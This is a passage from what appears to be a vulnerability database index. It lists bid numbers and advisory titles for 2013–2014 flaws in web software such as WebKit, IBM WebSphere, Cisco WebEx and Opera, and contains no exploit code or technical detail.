Dashboard Framework Security Bypass Vulnerability [65614] Opera Web Browser for Mac OS X Prior to 19.00 Address Bar URI Spoofing Vulnerability [65573] Open Web Analytics CVE-2014-1457 Cross Site Request Forgery Vulnerability [65571] Open Web Analytics 'owa_user_id' Parameter Cross Site Scripting Vulnerability [65537] 2E Web Option Predictable Session Token Authentication Bypass Vulnerability [65528] Drupal Webform Module Cross Site Scripting Vulnerability [65525] Drupal Webform Validation Module Cross Site Scripting Vulnerability [65517] webtrees 'wt_v3_street_view.php' Multiple Cross Site Scripting Vulnerabilities [65516] Cisco Unified Communications Manager CMIVR Interface SQL Injection Vulnerability [65514] Cisco Unified Communications Manager IP Manager Assistant Interface SQL Injection Vulnerability [65499] Cisco Unified Communications Manager Java Database Interface SQL Injection Vulnerability [65494] Cisco Unified Communications 'log4jinit' Web Application Unauthorized Access Vulnerability [65489] IBM WebSphere Portal CVE-2013-6722 Arbitrary File Upload Vulnerability [65477] IBM Connections Portlets for WebSphere Portal Multiple Cross Site Scripting Vulnerabilities [65442] PHP Webcam Video Conference Local File Include and Cross Site Scripting Vulnerabilities [65437] IcedTea-Web LiveConnect Implementation Insecure Temporary File Creation Vulnerability [65405] Symantec Web Gateway Multiple Unspecified Cross Site Scripting Vulnerabilities [65404] Symantec Web Gateway CVE-2013-5012 Multiple SQL Injection Vulnerabilities [65396] Maian Weblog 'index.php' Multiple Cross Site Scripting Vulnerabilities [65391] Opera Web Browser for Android Intent Scheme URL's Handling Information Disclosure Vulnerability [65365] IBM WebSphere Transformation Extender CVE-2013-2962 Local Denial of Service Vulnerability [65354] Fortinet Fortiweb CVE-2014-1458 HTML Injection Vulnerability [65350] Web Video Streamer Multiple Security Vulnerabilities [65303] Fortinet Fortiweb 'filter' Parameter Cross Site Scripting Vulnerability [65300] Symantec Encryption Management Platform Web Email Protection Unauthorized Access Vulnerability [65231] WordPress WebEngage Plugin Multiple Cross Site Scripting Vulnerabilities [65198] Cisco WebEx Meetings Server CVE-2014-0682 Security Bypass Vulnerability [65178] Opera Web Browser Prior to 19.00 Multiple Unspecified Security Vulnerabilities [65144] Cisco Secure Access Control System Portal Interface Access Security Bypass Vulnerability [65100] IBM WebSphere Application Server CVE-2013-6330 Information Disclosure Vulnerability [65099] IBM WebSphere Application Server in the Administrative Console Cross Site Scripting Vulnerability [65096] IBM WebSphere Application Server Denial of Service Vulnerability [65081] Dell OpenManage Web Application OSPF Functionality Denial of Service Vulnerability [65075] Dell GoAhead Web Server Login Page Form Denial of Service Vulnerability [65051] Red Hat JBoss Web Framework Kit Information Disclosure Vulnerability [65049] Red Hat JBoss Web Framework Kit XML External Entity Information Disclosure Vulnerability [65040] AfterLogic WebMail 'Body' Field HTML Injection Vulnerability [64983] Cisco Secure Access Control System RMI Interface Authorization Bypass Vulnerability [64980] Cisco WebEx Meetings Server Administrative Password Disclosure Vulnerability [64962] Cisco Secure Access Control System RMI Interface Unauthenticated Access Security Vulnerability [64958] Cisco Secure Access Control System RMI Interface Remote Privilege Escalation Vulnerability [64835] Oracle WebCenter Portal CVE-2013-5869 Remote Security Vulnerability [64827] Oracle iPlanet Web Proxy Server CVE-2013-5808 Remote Security Vulnerability [64779] Atmail Webmail Server Email Body HTML Injection Vulnerability [64777] Atmail Webmail Server CVE-2013-6028 Cross Site Request Forgery Vulnerability [64776] Cisco RVS4000/WRVS4400N/WAP4410N Devices Test Interface Remote Privilege Escalation Vulnerability [64774] Open Web Analytics 'owa_email_address' Parameter SQL Injection Vulnerablity [64750] InduSoft Web Studio Security Vulnerability [64681] WEBCrafted 'username' Field HTML Injection Vulnerability [64667] WordPress Zingiri Web Shop Plugin Unspecified Security Vulnerability [64659] Joomla! Komento 'website' Parameter Cross-Site Scripting Vulnerability [64653] WordPress Custom Website Data Plugin Cross-Site Request Forgery Vulnerability [64646] ZyXEL GS1510-16 'webctrl.cgi' Remote Password Disclosure Vulnerability [64631] Radware AppDirector Web Portal Security Weakness [64582] Roundcube Webmail Multiple Information Disclosure Vulnerabilities [64521] WebYaST 'config/initializers/secret_token.rb' Local Privilege Escalation Vulnerability [64512] Web2ldap Unspecified Cross Site Scripting Vulnerability [64498] IBM WebSphere Portal Content Template Catalog Remote Code Execution Vulnerability [64496] IBM Web Content Manager 'LIBRARY' Parameter XPath Injection Vulnerability [64495] IBM WebSphere Portal WCM Cross Site Scripting Vulnerability [64492] IBM WebSphere Portal Web Content Manager Information Disclosure Vulnerability [64488] IBM WebSphere Portal CVE-2013-6723 Information Disclosure Vulnerability [64455] Cisco NX-OS Command Line Interface (CLI) Local Arbitrary File Access Vulnerability [64450] Cisco NX-OS Command Line Interface (CLI) Local Arbitrary File Access Vulnerability [64371] EtoShop Dynamic Biz Website Builder (QuickWeb) Multiple SQL Injection Vulnerabilities [64363] Icinga Web GUI CVE-2013-7108 Multiple Off-By-One Memory Corruption Vulnerabilities [64362] WebKit CVE-2013-5228 Use After Free Memory Corruption Vulnerability [64361] WebKit CVE-2013-5199 Unspecified Memory Corruption Vulnerability [64360] WebKit CVE-2013-5225 Unspecified Memory Corruption Vulnerability [64359] WebKit CVE-2013-5198 Unspecified Memory Corruption Vulnerability [64358] WebKit CVE-2013-5197 Unspecified Memory Corruption Vulnerability [64356] WebKit CVE-2013-5196 Unspecified Memory Corruption Vulnerability [64354] WebKit CVE-2013-2909 Use After Free Remote Code Execution Vulnerability [64353] WebKit CVE-2013-5195 Unspecified Memory Corruption Vulnerability [64340] IBM Rational ClearQuest Web Client CVE-2013-5422 Unspecified Information Disclosure Vulnerability [64339] IBM Rational Focal Point Webservice Axis Gateway CVE-2013-5398 Information Disclosure Vulnerability [64338] IBM Rational Focal Point Webservice Axis Gateway CVE-2013-5397 Information Disclosure Vulnerability [64306] Cisco WebEx Meeting Center Verbose Server Error Response Remote Information Disclosure Vulnerability [64305] Cisco WebEx Training Center Training Registration Page Content Spoofing Vulnerability [64304] Auction Website Script Lowest Unique Bid Auction 'id' Parameter SQL Injection Vulnerability [64303] Auction Website Script Ebay Clone 'id' Parameter SQL Injection Vulnerability [64301] IBM WebSphere Service Registry and Repository CVE-2013-6721 HTML Injection Vulnerability [64299] Auction Website Script Penny Auction 'id' Parameter SQL Injection Vulnerability [64292] Cisco WebEx Training Center CVE-2013-6968 Email Enumeration Weakness [64290] Cisco WebEx Training Center CVE-2013-6710 Cross Site Request Forgery Vulnerability [64289] Webbynode Ruby Gems CVE-2013-7086 Command Injection Vulnerability [64288] Cisco WebEx Meeting Center Collaboration Partner Access Console Cross Site Scripting Vulnerability [64287] Cisco WebEx Training Center CVE-2013-6971 Open Redirection Vulnerability [64286] Cisco WebEx Training Center Registration ID CVE-2013-6973 Information Disclosure Vulnerability [64285] Cisco WebEx Training Center CVE-2013-6966 Open Redirection Vulnerability [64284] Cisco WebEx Sales Center CVE-2013-6967 Open Redirection Vulnerability [64282] Cisco WebEx Training Center Training Session Number Information Disclosure Vulnerability [64281] Cisco WebEx Training Center CVE-2013-6965 Multiple Information Disclosure Vulnerabilities [64280] Cisco WebEx Meeting Center CVE-2013-6964 Security Bypass Vulnerability [64277] Cisco WebEx Training Center CVE-2013-6963 Cross Site Scripting Vulnerability [64276] Cisco WebEx Training Center CVE-2013-6709 Multiple Information Disclosure Vulnerabilities [64275] Cisco WebEx Meeting Center CVE-2013-6962 Cross Site Scripting Vulnerability [64273] Cisco WebEx Meeting Center CVE-2013-6960 Multiple Cross Site Scripting Vulnerabilities [64272] Cisco WebEx Sales Center CVE-2013-6711 Cross Site Scripting Vulnerability [64271] Cisco WebEx Sales Center CVE-2013-6959 Open Redirection Vulnerability [64110] Enorth Webpublisher CMS CVE-2013-6985 'thisday' Parameter SQL Injection Vulnerability [64030] Satechi Smart Travel Router Web Management Console Remote Authentication Bypass Vulnerability [63957] GE PACSystems RX3i Ethernet Interface Remote Buffer Overflow Vulnerability [63950] Multiple General Electric (GE) Products Ethernet Interface Remote Buffer Overflow Vulnerability [63945] Multiple General Electric (GE) Products Ethernet Interface Remote Buffer Overflow Vulnerability [63921] Ganglia Web 'get_context.php' Cross Site Scripting Vulnerability [63805] SKIDATA Freemotion.Gate Unauthenticated Web Services Multiple Command Execution Vulnerabilities [63801] Opera Web Browser Prior to 18.00 Multiple Unspecified Security Vulnerabilities [63786] IBM WebSphere Application Server Liberty Profile Insecure File Permissions Vulnerability [63781] IBM WebSphere Application Server CVE-2013-5414 Security Bypass Vulnerability [63780] IBM WebSphere Application Server HTTP Response Data Cross Site Scripting Vulnerability [63778] IBM WebSphere Application Server CVE-2013-5418 Cross Site Scripting Vulnerability [63724] Apple iOS Safari Mobile Web Browser Session Fixation and Security Bypass Vulnerabilities [63700] IBM WebSphere Virtual Enterprise CVE-2013-5425 Cross Site Scripting Vulnerability [63699] Cisco IOS SSL VPN Interface CVE-2013-6686 Remote Denial of Service Vulnerability [63656] Juniper Networks JUNOS EmbedThis AppWeb Web Server Cross Site Scripting Vulnerability [63643] IBM WebSphere Portal URL Manipulation Information Disclosure Vulnerability [63641] IBM WebSphere Portal CVE-2013-5378 Cross Site Scripting Vulnerability [63640] IBM WebSphere Portal CVE-2013-5379 Cross Site Scripting Vulnerability [63626] Microweber 'for_id' Parameter SQL Injection Vulnerability [63611] IBM Sametime WebPlayer Extension CVE-2013-3986 Denial of Service Vulnerability [63579] Webers CMS Multiple Input Validation Vulnerabilities [63578] IBM Domino Web Administrator CVE-2013-4055 Cross Site Scripting Vulnerability [63577] IBM Domino Web Administrator CVE-2013-4050 Cross Site Request Forgery Vulnerability [63576] IBM Domino Web Administrator CVE-2013-4051 Cross Site Scripting Vulnerability [63571] Drupal Payment for Webform Module Access Bypass Vulnerability [63546] Microsoft Windows Graphics Device Interface CVE-2013-3940 Remote Integer Overflow Vulnerability [63533] Horde Groupware Webmail Edition Unique Token Cross Site Request Forgery Vulnerability [63532] Horde GroupWare Web Mail Edition Cross Site Scripting and Cross Site Request Forgery Vulnerabilities [63484] LiteSpeed Web Server Local Privilege Escalation Vulnerability [63483] Webuzo Cookie Value Handling Remote Command Injection Vulnerability [63481] LiteSpeed Web Server Race Condition Insecure Temporary File Creation Vulnerability [63480] Webuzo Invalid Login Handling User Enumeration Weakness [63464] Webuzo 'user' Parameter Cross Site Scripting Vulnerability [63377] Horde Groupware Webmail Edition CVE-2013-6275 Multiple Cross Site Request Forgery Vulnerabilities [63369] ikiwiki-hosting Site Creation Interface Cross Site Scripting Vulnerability [63358] Tyler Technologies TaxWeb Multiple Information Disclosure Vulnerabilities [63357] Tyler Technologies TaxWeb 'login.jsp' Cross Site Request Forgery Vulnerability [63356] Tyler Technologies TaxWeb 'accountNum' Parameter Cross Site Scripting Vulnerability [63303] RSA Authentication Agent For Web For IIS CVE-2013-3280 Security Bypass Vulnerability [63302] SAP NetWeaver Web Dynpro Live Update XML External Entity Information Disclosure Vulnerability [63300] RoundCube Webmail '_session' Parameter Remote Security Vulnerability [63289] WebKit CVE-2013-5130 Unspecified Security Vulnerability [63268] WebTester 'install2.php' Multiple Remote Command Execution Vulnerabilities [63250] IBM WebSphere DataPower XC10 Appliance CVE-2013-5446 Unspecified Security Vulnerability [63248] IBM WebSphere DataPower XC10 Appliance CVE-2013-5428 Unauthorized Access Vulnerability [63247] WebCollab 'item' Parameter HTTP Response Splitting Vulnerability [63218] VMware vSphere Web Client Server Session ID CVE-2013-5971 Handling Session Fixation Vulnerability [63166] SpamTitan web GUI Multiple Input Validation Vulnerabilities [63160] WebTester Multiple Security Vulnerabilities [63074] Oracle Web Cache CVE-2013-3836 Remote Security Vulnerability [63058] Oracle Web Services CVE-2013-3828 Remote Security Vulnerability [63049] Oracle WebCenter Content CVE-2013-5813 Remote Security Vulnerability [63012] Cisco WebEx Meetings Server Deployment Passphrase Validation Security Bypass Vulnerability [63011] OpenWebif Unauthorized Access Vulnerability [63006] Dreambox Webcontrol Unauthorized Access Vulnerability [62998] IBM WebSphere eXtreme Scale Monitoring Console Unspecified Information Disclosure Vulnerability [62994] IBM WebSphere eXtreme Scale Monitoring Console CVE-2013-5390 Cross Site Scripting Vulnerability [62992] IBM WebSphere eXtreme Scale Monitoring Console CVE-2013-5394 Unspecified Security Vulnerability [62948] Imperva SecureSphere Web Application Firewall Search Field SQL Injection Vulnerability [62940] Juniper Junos J-Web CVE-2013-4689 Cross Site Request Forgery Vulnerability [62885] Opera Web Browser Prior to 17.00 Multiple Unspecified Security Vulnerabilities [62792] WebAssist PowerCMS Multiple Cross Site Scripting Vulnerabilities [62748] Microweber 'file' Parameter Remote Code Execution Vulnerability [62683] IBM WebSphere DataPower XC10 Appliance CVE-2013-5403 Unauthorized Access Vulnerability [62646] Cisco IOS And IOS XE RSVP Interface Queue Wedge CVE-2013-5478 Remote Denial of Service Vulnerability [62635] ClearSCADA Web Requests Remote Denial Of Service Vulnerability [62631] elproLOG MONITOR WebAccess Multiple Cross Site Scripting and SQL Injection Vulnerabilities [62624] WordPress Custom Website Data Plugin 'ref' Parameter Cross Site Scripting Vulnerability [62615] Intelligent Platform Management Interface CVE-2012-4085 Information Disclosure Vulnerability [62571] WebKit CVE-2013-1044 Unspecified Memory Corruption Vulnerability [62570] WebKit CVE-2013-1043 Unspecified Memory Corruption Vulnerability [62569] WebKit CVE-2013-5128 Unspecified Memory Corruption Vulnerability [62568] WebKit CVE-2013-5127 Unspecified Memory Corruption Vulnerability [62567] WebKit CVE-2013-5126 Unspecified Memory Corruption Vulnerability [62565] WebKit CVE-2013-1038 Unspecified Memory Corruption Vulnerability [62563] WebKit CVE-2013-1047 Unspecified Memory Corruption Vulnerability [62560] WebKit CVE-2013-5125 Unspecified Memory Corruption Vulnerability [62559] WebKit CVE-2013-1046 Unspecified Memory Corruption Vulnerability [62558] WebKit CVE-2013-1045 Unspecified Memory Corruption Vulnerability [62557] WebKit CVE-2013-1042 Unspecified Memory Corruption Vulnerability [62556] WebKit CVE-2013-1041 Unspecified Memory Corruption Vulnerability [62554] WebKit CVE-2013-1040 Unspecified Memory Corruption Vulnerability [62553] WebKit CVE-2013-1039 Unspecified Memory Corruption Vulnerability [62551] WebKit CVE-2013-1037 Unspecified Memory Corruption Vulnerability [62512] Google Android WebView Remote Security Bypass Vulnerability [62490] RETIRED: WebKit Multiple Unspecified Memory Corruption Vulnerabilities [62426] IcedTea-Web CVE-2013-4349 Heap Based Buffer Overflow Vulnerability [62425] Opera Web Browser CVE-2013-4705 Cross Site Scripting Vulnerability [62417] Sophos UTM WebAdmin Unspecified Security Vulnerability [62339] IBM WebSphere Application Server CVE-2013-0596 Cross Site Scripting Vulnerability [62338] IBM WebSphere Application Server CVE-2013-4053 Remote Privilege Escalation Vulnerability [62336] IBM WebSphere Application Server CVE-2013-4052 Cross Site Scripting Vulnerability [62305] Juniper Junos J-Web Privilege Escalation Vulnerability [62289] opWebAPIPlugin Multiple XML External Entity Injection Vulnerabilities [62265] Sophos Web Protection Appliance CVE-2013-4984 Local Command Injection Vulnerability [62263] Sophos Web Appliance CVE-2013-4983 Remote Command Injection Vulnerability [62190] IBM WebSphere Application Server for z/OS JAX-WS Unspecified Remote Security Vulnerability [62164] Cisco WebEx WRF Player JPEG DHT Index CVE-2013-1119 Memory Corruption Vulnerability [62163] Cisco WebEx WRF Player CVE-2013-1118 Stack Buffer Overflow Vulnerability [62160] Cisco WebEx WRF Player Exception Handler CVE-2013-1117 Memory Corruption Vulnerability [62159] Cisco WebEx ARF Player CVE-2013-1116 Heap Memory Corruption Vulnerability [62158] Cisco WebEx ARF Player CVE-2013-1115 Memory Corruption Vulnerability [62093] IBM WebSphere Commerce CVE-2013-2992 Denial of Service Vulnerability [62038] RoundCube Webmail CVE-2013-5646 HTML-injection Vulnerability [62026] Opera Web Browser Prior to 16.00 Multiple Unspecified Security Vulnerabilities [61992] IBM WebSphere Extended Deployment Compute Grid CVE-2013-4039 Information Disclosure Vulnerability [61988] IBM WebSphere Commerce CVE-2013-0566 Multiple Cross Site Scripting Vulnerabilities [61976] RoundCube Webmail Multiple HTML-injection Vulnerabilities [61941] IBM WebSphere Application Server CVE-2013-2967 Cross Site Scripting Vulnerability [61940] IBM WebSphere Application Server CVE-2013-2976 Local Information Disclosure Vulnerability [61937] IBM WebSphere Application Server CVE-2013-3029 Cross-Site Request Forgery Vulnerability [61935] IBM WebSphere Application Server CVE-2013-4004 Cross Site Scripting Vulnerability [61906] Twilight CMS DeWeS Web Server Directory Traversal Vulnerability [61902] IBM WebSphere Portal CVE-2013-3016 Unauthorized Access Vulnerability [61901] IBM WebSphere Application Server CVE-2013-4005 Cross Site Scripting Vulnerability [61884] Intelligent Platform Management Interface CVE-2013-4037 Authentication Bypass Vulnerability [61853] Intelligent Platform Management Interface CVE-2013-4038 Remote Information Disclosure Weakness [61826] IBM WebSphere DataPower SOA Appliances Kerberos AAA Policy Security Bypass Vulnerability [61807] Copy to WebDAV Multiple Security Vulnerabilities [61767] OSIsoft PI Interface for IEEE C37.118 Invalid Memory Denial of Service Vulnerability [61766] OSIsoft PI Interface for IEEE C37.118 CVE-2013-2800 Memory Corruption Vulnerability [61752] IBM WebSphere Portal CVE-2013-0587 Multiple Cross Site Scripting Vulnerabilities [61722] Google Chrome 'WebVTTParser::createDocumentFragmentFromCueText()' Denial of Service Vulnerability [61705] Drupal RESTful Web Services Module Multiple Access Bypass and Security Bypass Vulnerabilities [61662] TrustPort WebFilter 'help.php' Arbitrary File Access Vulnerability [61590] Google Web Toolkit CVE-2013-4204 Multiple Cross Site Scripting Vulnerabilities [61572] Cisco WebEx Meetings Server CVE-2013-3448 Remote Authentication Bypass Vulnerability [61501] WebDisk 'p' Parameter Remote Code Execution Vulnerability [61483] IBM WebSphere Commerce Enterprise CVE-2013-2994 Authentication Bypass Vulnerability [61481] IBM WebSphere Commerce Enterprise CVE-2013-2993 Authentication Bypass Vulnerability [61469] GE Proficy CIMPLICITY 'CimWebServer' Remote Stack Buffer Overflow Vulnerabilities [61417] Cisco Unified MeetingPlace Web Conferencing CVE-2013-3438 Security Bypass Vulnerability [61386] WebCalendar Multiple Security Bypass Vulnerabilities [61304] Cisco WebEx One-Click Client Password Encryption Information Disclosure Vulnerability [61290] Symantec Encryption Management Server Web Email Protection Cross Site Scripting Vulnerability [61228] Oracle WebCenter Content CVE-2013-3770 Remote Security Vulnerability [61223] Oracle WebCenter Content CVE-2013-3769 Remote Security Vulnerability [61220] Oracle WebCenter Content CVE-2013-3772 Remote Security Vulnerability [61106] Symantec Web Gateway CVE-2013-1616 Remote Command Injection Vulnerability [61105] Symantec Web Gateway CVE-2013-4673 Remote Command Execution Vulnerability [61104] Symantec Web Gateway CVE-2013-4672 Remote Command Execution Vulnerability [61103] Symantec Web Gateway CVE-2013-4670 Cross Site Scripting and HTML Injection Vulnerabilities [61102] Symantec Web Gateway CVE-2013-4671 Cross Site Request Forgery Vulnerability [61101] Symantec Web Gateway CVE-2013-1617 SQL Injection Vulnerability [61076] Intelligent Platform Management Interface CVE-2013-4786 Information Disclosure Vulnerability [61005] Multiple D-Link Products UPnP SOAP Interface Multiple Command Injection Vulnerabilities [61001] Intelligent Platform Management Interface Null Length Credential Authentication Bypass Vulnerability [60879] IBM WebSphere MQ Server Control Commands Multiple Local Privilege Escalation Vulnerabilities [60876] libvirt 'virConnectListAllInterfaces' Method Denial of Service Vulnerability [60830] Kent Web CLIP-MAIL CVE-2013-3649 Cross-Site Scripting Vulnerability [60828] Kent Web POST-MAIL CVE-2013-3648 Cross-Site Scripting Vulnerability [60804] Cisco Web Security Appliance CVE-2013-3383 Command Injection Vulnerability [60724] IBM WebSphere Application Server CVE-2013-0597 Cross Site Scripting Vulnerability [60723] Cisco WebEx Social CVE-2013-3392 Multiple Cross Site Request Forgery Vulnerabilities [60677] IBM Sterling Connect:Direct Browser User Interface Local Information Disclosure Vulnerability [60676] IBM Sterling Connect:Direct Browser User Interface Local Information Disclosure Vulnerability [60596] IBM WebSphere Commerce Enterprise CVE-2013-0523 Information Disclosure Vulnerability [60520] Galapagos for Android 'WebView' Class Information Disclosure Vulnerability [60518] Angel for Android 'WebView' Class Information Disclosure Vulnerability [60509] IBM Data Studio Web Console CVE-2013-2980 Cross Site Request Forgery Vulnerability [60373] Cisco WebEx Meetings Server CVE-2013-1205 Information Disclosure Vulnerability [60363] WebKit CVE-2013-1013 Unspecified Cross Site Scripting Vulnerability [60361] WebKit CVE-2013-1012 Unspecified Cross Site Scripting Vulnerability [60253] IBM WebSphere Cast Iron CVE-2013-2972 Unspecified Security Vulnerability [60231] IBM WebSphere Portal CVE-2013-0549 Cross Site Scripting Vulnerability [60218] Drupal Webform Module Components Label HTML Injection Vulnerability [60201] IBM WebSphere Portal CVE-2013-2950 HTTP Response Splitting Vulnerability [60199] ZNC WebAdmin Multiple NULL Pointer Dereference Denial of Service Vulnerabilities [60158] Siemens Solid Edge WebPartHelper ActiveX Remote Code Execution Vulnerability [60155] Cisco WebEx for iOS CVE-2012-6399 Certificate Validation Security Bypass Vulnerability [60090] CAREL pCOWeb Default Credentials Security Bypass Vulnerabilities [60027] WebSphere DataPower SOA Appliances CVE-2013-0499 Cross Site Scripting Vulnerability [59998] Wireshark Websocket Dissector Denial of Service Vulnerability [59996] Wireshark Websocket Dissector 'packet-websocket.c' Denial of Service Vulnerability [59990] MiniWeb HTTP POST Denial of Service Vulnerability [59984] web2py 'share.js' Script Cross Site Scripting Vulnerability [59980] Stanford WebAuth FastCGI 'login.fcgi' Information Disclosure Vulnerability [59977] WebKit CVE-2013-1008 Unspecified Memory Corruption Vulnerability [59976] WebKit CVE-2013-1010 Unspecified Memory Corruption Vulnerability [59974] WebKit CVE-2013-1011 Unspecified Memory Corruption Vulnerability [59973] WebKit CVE-2013-1006 Unspecified Memory Corruption Vulnerability [59972] WebKit CVE-2013-1005 Unspecified Memory Corruption Vulnerability [59971] WebKit CVE-2013-1004 Unspecified Memory Corruption Vulnerability [59970] WebKit CVE-2013-1007 Unspecified Memory Corruption Vulnerability [59967] WebKit CVE-2013-1003 Unspecified Memory Corruption Vulnerability [59965] WebKit CVE-2013-1002 Unspecified Memory Corruption Vulnerability [59964] WebKit CVE-2013-1001 Unspecified Memory Corruption Vulnerability [59963] WebKit CVE-2013-1000 Unspecified Memory Corruption Vulnerability [59960] WebKit CVE-2013-0999 Heap Memory Corruption Vulnerability [59959] WebKit CVE-2013-0998 Memory Corruption Vulnerability [59958] WebKit CVE-2013-0997 Memory Corruption Vulnerability [59957] WebKit CVE-2013-0996 Unspecified Memory Corruption Vulnerability [59956] WebKit CVE-2013-0995 Unspecified Memory Corruption Vulnerability [59955] WebKit CVE-2013-0994 Unspecified Memory Corruption Vulnerability [59954] WebKit CVE-2013-0993 Unspecified Memory Corruption Vulnerability [59953] WebKit CVE-2013-0992 Unspecified Memory Corruption Vulnerability [59944] WebKit CVE-2013-0991 Unspecified Memory Corruption Vulnerability [59939] RETIRED: WebKit Multiple Unspecified Memory Corruption Vulnerabilities [59871] Cisco WebEx Social CVE-2013-1245 Multiple Security Bypass Vulnerabilities [59867] Cisco WebEx Social CVE-2013-1244 Cross Site Scripting Vulnerability [59711] IBM WebSphere DataPower XC10 Appliance CVE-2013-0600 Unspecified Security Vulnerability [59696] Cisco Prime Central for HCS Assurance OpenView Web Menus Cross Site Scripting Vulnerability [59667] WeBid Local File Disclosure Vulnerability and SQL Injection Vulnerability [59650] IBM WebSphere Application Server CVE-2013-0482 Security Vulnerability [59649] Multiple Cisco WebEx Products CVE-2013-1232 Information Disclosure Vulnerability [59624] Cisco WebEx CVE-2013-1231 Information Disclosure Vulnerability [59623] Beat Websites 'gid' Parameter SQL Injection Vulnerability [59544] WebKit Use-After-Free Remote Code Execution Vulnerability [59517] WebKit 'addChildNodesToDeletionQueue()' Function Use After Free Remote Code Execution Vulnerability [59515] WebKit 'FrameLoader::checkCompleted()' Function Use After Free Remote Code Execution Vulnerability [59412] WebKit 'CompositeEditCommand.cpp' Use-After-Free Remote Code Execution Vulnerability [59379] ERDAS ER Viewer 'ERM_convert_to_correct_webpath()' Function Stack Buffer Overflow Vulnerability [59353] WordPress All in One Webmaster Plugin Cross Site Request Forgery Vulnerability [59317] Opera Web Browser Unspecified Security Vulnerability [59313] Websense Email Security CVE-2012-4605 Information Disclosure Vulnerability [59286] IcedTea-Web CVE-2013-1927 Security Bypass Vulnerability [59281] IcedTea-Web CVE-2013-1926 Security Bypass Vulnerability [59268] Novell GroupWise WebAccess 'onError' Attribute Cross-Site Scripting Vulnerability [59252] IBM WebSphere Application Server Liberty Profile CVE-2013-0540 Security Bypass Vulnerability [59251] IBM WebSphere Application Server CVE-2013-0543 Security Bypass Vulnerability [59250] IBM WebSphere Application Server CVE-2013-0544 Directory Traversal Vulnerability [59248] IBM WebSphere Application Server CVE-2013-0542 Cross Site Scripting Vulnerability [59247] IBM WebSphere Application Server CVE-2013-0541 Local Denial Of Service Vulnerability [59246] IBM WebSphere Application Server CVE-2013-0565 Cross Site Scripting Vulnerability [59132] Oracle WebCenter Sites CVE-2013-1509 HTTP Header Injection Vulnerability [59122] Oracle WebCenter Content CVE-2013-1559 Remote Code Execution Vulnerability [59112] Oracle WebCenter Capture CVE-2013-1516 Remote Code Execution Vulnerability [59017] Drupal RESTful Web Services Module Denial of Service Vulnerability [59008] Cisco IOS XE Bridge Domain Interface Remote Denial of Service Vulnerability [58946] MiniWeb Directory Traversal and Arbitrary File Upload Vulnerabilities [58940] PowerTCP WebServer for ActiveX 'DartWebserver.dll' Denial of Service Vulnerability [58864] Opera Web Browser CVE-2013-3210 Information Disclosure Vulnerability [58838] C2 WebResource 'File' Parameter Cross Site Scripting Vulnerability [58834] Sophos Web Protection Appliance Multiple Cross Site Scripting Vulnerabilities [58833] Sophos Web Protection Appliance CVE-2013-2641 Arbitrary File Disclosure Vulnerability [58832] Sophos Web Protection Appliance CVE-2013-2642 Multiple Command Injection Vulnerabilities [58801] jigbrowser+ for Android 'WebView' Class Information Disclosure Vulnerability [58781] KNet Web Server Buffer Overflow Vulnerability [58771] WordPress Feedweb Plugin 'wp_post_id' Parameter Cross Site Scripting Vulnerability [58770] RoundCube Webmail 'generic_message_footer' Value Arbitrary File Access Vulnerability [58738] Atmail WebMail CVE-2013-2585 Cross Site Scripting Vulnerability [58720] OrionDB Web Directory Multiple Cross Site Scripting Vulnerabilities [58648] IBM Lotus Domino 'webadmin.nsf' Cross Site Scripting Vulnerability [58641] VxWorks Web Server CVE-2013-0716 Remote Denial of Service Vulnerability [58603] askiaweb CVE-2013-0124 Multiple Cross Site Scripting Vulnerabilities [58602] askiaweb CVE-2013-0123 Multiple SQL Injection Vulnerabilities [58597] Linux Kernel Netlink Interface Multiple Information Disclosure Vulnerabilities [58496] WebKit CVE-2013-0960 Unspecified Memory Corruption Vulnerability [58495] WebKit CVE-2013-0961 Unspecified Memory Corruption Vulnerability [58491] TIBCO Spotfire Web Player Cross Site Scripting and Security Bypass Vulnerabilities [58472] Oracle GlassFish Web Space Server CVE-2012-1712 Directory Traversal Vulnerability [58441] Web Cookbook Multiple Cross Site Scripting and SQL Injection Vulnerabilities [58388] WebKit Type Confusion CVE-2013-0912 Remote Code Execution Vulnerability [58255] IBM WebSphere Commerce CVE-2012-4855 Denial Of Service Vulnerability [58252] Websense TRITON Unified Security Center Multiple Security Vulnerabilities [58250] WebCalendar CVE-2013-1422 User Enumeration Weakness [58204] Ganglia Web 'view_name' Parameter Cross Site Scripting Vulnerability [58167] WebKit MathML Library CVE-2013-2268 Unspecified Security Vulnerability [58138] SkunkWeb 'sw.log' Insecure File Permissions Vulnerability [58132] Rix4Web 'dir_link' Parameter SQL Injection Vulnerability [58126] webfs 'webfsd.log' Insecure File Permissions Vulnerability [58092] Web Cookbook SQL Injection and Information Disclosure Vulnerabilities [58084] Alt-N MDaemon WebAdmin Arbitrary Command Execution Vulnerability [58076] Alt-N MDaemon WorldClient And WebAdmin Cross Site Request Forgery Vulnerability [57939] IBM WebSphere Cast Iron Cloud Integration CVE-2013-0465 Unspecified Security Vulnerability [57938] IBM WebSphere Message Broker Multiple Security Vulnerabilities [57878] IBM Tivoli Application Dependency Discovery Manager Web UI Portal Multiple Security Vulnerabilities [57870] Ganglia Web CVE-2013-0275 Multiple Cross Site Scripting Vulnerabilities [57849] RoundCube Webmail Cross Site Scripting Vulnerability [57839] IBM Netezza WebAdmin Multiple Security Vulnerabilities [57773] Opera Web Browser TLS CVE-2013-1618 Information Disclosure Vulnerability [57756] Opera Web Browser Use-After-Free Memory Corruption Vulnerability [57680] Free Monthly Websites Multiple Security Bypass and Arbitrary File Upload Vulnerabilities [57633] Opera Web Browser Prior to 12.13 Multiple Security Vulnerabilities [57591] WebKit CVE-2013-0968 Unspecified Memory Corruption Vulnerability [57590] WebKit CVE-2013-0959 Unspecified Memory Corruption Vulnerability [57589] WebKit CVE-2013-0958 Unspecified Memory Corruption Vulnerability [57588] WebKit CVE-2013-0956 Unspecified Memory Corruption Vulnerability [57587] WebKit CVE-2013-0955 Unspecified Memory Corruption Vulnerability [57586] WebKit CVE-2013-0954 Unspecified Memory Corruption Vulnerability [57585] WebKit CVE-2013-0953 Unspecified Memory Corruption Vulnerability [57584] WebKit CVE-2013-0952 Unspecified Memory Corruption Vulnerability [57583] WebKit CVE-2013-0962 Cross Site Scripting Vulnerability [57582] WebKit CVE-2013-0951 Unspecified Memory Corruption Vulnerability [57581] WebKit CVE-2013-0950 Unspecified Memory Corruption Vulnerability [57580] WebKit CVE-2013-0949 Unspecified Memory Corruption Vulnerability [57576] WebKit CVE-2013-0948 Unspecified Memory Corruption Vulnerability [57568] Cisco WebEx Social CVE-2013-1107 Information Disclosure Vulnerability [57561] PHPWeby Free Directory Script 'contact.php' Multiple SQL Injection Vulnerabilities [57538] Google Web 